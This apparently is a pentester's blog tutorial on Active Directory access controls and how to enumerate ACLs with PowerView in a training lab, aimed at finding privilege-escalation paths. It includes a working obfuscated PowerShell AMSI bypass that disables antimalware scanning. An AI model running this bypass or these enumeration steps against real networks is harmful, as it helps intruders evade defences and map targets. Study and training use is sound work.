R3d Buck3T
Published in

R3d Buck3T

ACTIVE DIRECTORY — DOMAIN ENUMERATION

Enumerating Access Controls in Active Directory

Understanding Active Directory Controls — ACLs, ACEs, DACLs, and SACLs

https://unsplash.com/photos/Mwkd5QQ9b3kason Hafso

Access Controls are a set of permissions given to an object. In an active directory environment, an object is an entity that represents an available resource within the organization’s network, such as domain controllers, users, groups, computers, shares, etc. There are 12 types of AD objects:

  • User object
  • Contact object
  • Printer object
  • Computer object
  • Shared folder
  • Group
  • Organizational Unit
  • Domain
  • Domain controller
  • Site objects
  • Bulletin
  • Foreign security principals

Generally, maintaining Active Directory permissions is complicated and hard to manage, especially in complex environments with multiple domains and forests. Weak permissions are one of the go-to vectors for privilege escalation during an internal security assessment. That’s because their enumeration process doesn’t require special domain level privileges, and they can be done on the user level.

Today’s post discusses the active directory access controls, their structure, and how to enumerate them in a post-exploitation scenario using the PowerView script. The demonstration steps will be on the Pentester Academy Active Directory Lab by Nikhil Mittal associated with the CRTP course.

$_Access_Control_Overview

The Access Control model is designed to check requests from users, services, or processes to access an available object. The requests get granted or rejected depending on the requested object’s permissions.

The ACL checking process involves 2 steps when evaluating a request:

  • Access token consists of the requester’s identity and privileges.
  • Object’s Security Descriptors are the permissions list, known as DACL and SACL. The DACL validates the requester Access Token against the object’s permissions list to decide to grant or reject that request, and the SACL logs the successes or failures of these requests.

📍 DACL is Discretionary Access Control List and SACL is System Access List.

DACLs List — Active Directory Enumeration
Figure 1 — shows the DACL list of Domain Admins group in an Active Directory

To better understand the model, let’s take an example of a user in the Sales department who wants access to a financial share called Budgeting 2022.

The user would initiate a request to the Budgeting 2022 object presenting their Access Token that shows their identity and privileges, i.e., John from the Sales Department.

Then, the targeted object — Budgeting 2020 validates the user access token against the object list of permissions (DACL). If the list allows the sales department members to access the Budgeting 2022 object, the user will grant the access, and if not, the request would get rejected, and in both cases, the granting or rejecting of the request would be logged by the SACL.

◼ ️DACL Structure

The access control list consists of multiple individual permissions known as ACEs Access Control Entries. Each entry has a permission type (allow or deny), a principal account (who is this permission for — user, group, computer), what objects the principal account can access, and the access rights [read, write, Full Control].

Access Control Entries (ACE) in a DACL list — Active Directory Enumeration
Figure 2 — shows the Access Control Entries (ACE) in a DACL list

$_Enumeration_Steps

The first step is to download the PowerView script and import it with the Import-Module cmdlet.

Import-Module .\powerview.ps1
Import PowerView Script — Active Directory Enumeration
Figure 3 — Import PowerView Script

If the AMSI (Antimalware Scan Interface) blocks the script, you can bypass it by running the below PowerShell command.

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

📌 Check this GitHub Gist for other PowerShell bypasses — reigningshells/powershell-bypasses.ps1

◼Get ACLs of Users and Groups Objects

To enumerate an objects’ access control permissions, run the Get-ObjectAcl cmdlet and pass it an object name (a user, group, or computer). The command would return a list of access entries related to the requested object. The GUID resolver parameter gets the group ID of the requested object.

If the object name is different than the SAM account name, use the SAMAccountName property with the object name.

Get-ObjectAcl Object-Name –ResolveGUIDsGet-ObjectAcl -SAMAccountName Object-Name –ResolveGUIDs
ACEs — Active Directory Enumeration
Figure 4 — ACEs of the object Student223
ACEs properties — Active Diretory Enumeraiton
Figure 5 — shows the ACEs properties of the student 223 object

As we see in the above screenshots, the command returns all the access control entries(ACEs) of the requested object student223”.

There are 4 interesting properties to check in the results:

  • ObjectDN (Object Distinguished Name) is the object name — Student223
  • IdentityReference is who has access to the object. As seen above, the built-in administrators’ group has access to the Student223 object.
  • ActiveDirectoryRights are the types of permissions given to the object. In our example, the built-in administrators’ group has WriteDacl and WriteOwner on the student223 object.
  • AccessControlType is an Allow access.

The WriteOwner permission indicates the object’s ownership which means that the built-in administrators have full control on the Student223 object. The WriteDACl is right to modify the objects DACL’s list.

There are other interesting permissions to look for when enumerating Active Directory rights like in the below list:

Interesting Active Directory Rights —Active Directory Enumeration
Figure 6- shows Interesting Active Directory Rights — iRed Team list

To filter through a specific type of permission, use the equal (-eq) operator and pass it the permission type such as “GenericAll.”

Get-ObjectAcl student223 |{$_.ActiveDirectoryRights -eq "GenericAll"}
Figure 7 — shows all ACEs with GenericAll permissions
Figure 8 — shows the groups who have the GenericAll (full control) permissions on the Student223 object

◼️Get ACLs Associated with Specific Prefix

Run the Get-ObjectACL command with the ADSPrefix parameter to search for specific controls using common names [CN], organizational units[OU], or domain controllers [DC]. In the example below, I searched for the access entries associated with the student machines Organizational Unit.

Get-ObjectAcl -ADSprefix 'OU=Studentmachines' - Verbose
Figure 9 — shows access entries associated with the student machines Organizational Unit

◼️ Get ACLs Associated with Specific LDAP path

With PowerView, we can search for access entries of an object using its LDAP path.

Run the Get-ObjectAcl cmdlet with the ADSpath parameter.

Get-ObjectAcl -ADSpath “LDAP:// ” -ResolveGUIDs -verbose
Get ACLs Associated with Specific LDAP path — Active Directory Enumeration
Figure 10 — shows the permissions of the Student230 object using its LDAP path

📍 You can get the AdPaths of objects by running these commands:

Get-Netcomputers -FullData | select cn, adspath Get-NetGroups -FullData | select cn, adspath

◼️ Get ACLS with Invoke Scanner

PowerView has a scanner module that scans the domain for all interesting abusable permissions, i.e., write, modify or genericall, etc.

To run the scanner, use Invoke-ACLScanner.

Invoke-ACLScanner -ResolveGUIDs

As seen in the below screenshot, the scanner found multiple access control entries with GenericAll rights. An example is the RDPUsers group with GenericAll rights on the Control127User object.

Figure 11 — shows the results of the Invoke-ACLScanner

◼️ Get ACLs Associated with UNC path

We can search for access controls of network shares like SYSVOL share for enumerating group policy objects and scripts using its UNC path.

To do so, run the Get-Path cmdlet with the Path parameter.

Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"
Figure 12 — shows get ACLs Associated with UNC path

That’s all for today; we learned about Active Directory access controls and how to enumerate them to collect valuable information to leverage for the privilege escalation phase.

Thanks a lot for reading !!

🔔 All of the used commands are found at R3d-Buck3T — (Active Directory — Access Control List (ACL) Enumeration)

🌐$_Refereces

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nairuz Abulhul

Nairuz Abulhul

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester >>Security Researcher